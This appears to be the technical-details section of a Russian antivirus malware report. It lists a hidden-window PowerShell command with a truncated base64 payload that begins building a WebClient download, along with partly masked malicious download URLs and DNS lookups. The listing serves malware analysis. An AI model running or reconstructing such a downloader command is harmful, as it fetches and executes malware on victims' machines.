Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABaADkAXwBfADQAXwA1AF8APQAoACcAQwA4ACcAKwAnAF8AMgAyADAAJwApADsAJABoAF8AXwAwADgAOAA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABOADIAXwAwAF8ANgA3ADcAPQAoACcAaAB0AH...
- 'js.####beredmodels.com':443
- http://80.#8.126.3/wp/wp-content/uploads/HfTT9hn
- http://kg#.##rov.spb.ru/LUGataK
- http://te###mak.com.tr/6nseJMHZgy
- http://www.te###mak.com.tr/6nseJMHZgy
- http://me###rox.com/6wcdQDCe
- DNS ASK kg#.##rov.spb.ru
- DNS ASK te###mak.com.tr
- DNS ASK me###rox.com
- DNS ASK js.####beredmodels.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABaADkAXwBfADQAXwA1AF8APQAoACcAQwA4ACcAKwAnAF8AMgAyADAAJwApADsAJABoAF8AXwAwADgAOAA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABOADIAXwAwAF8ANgA3ADcAPQAoACcAaAB0AH...' (со скрытым окном)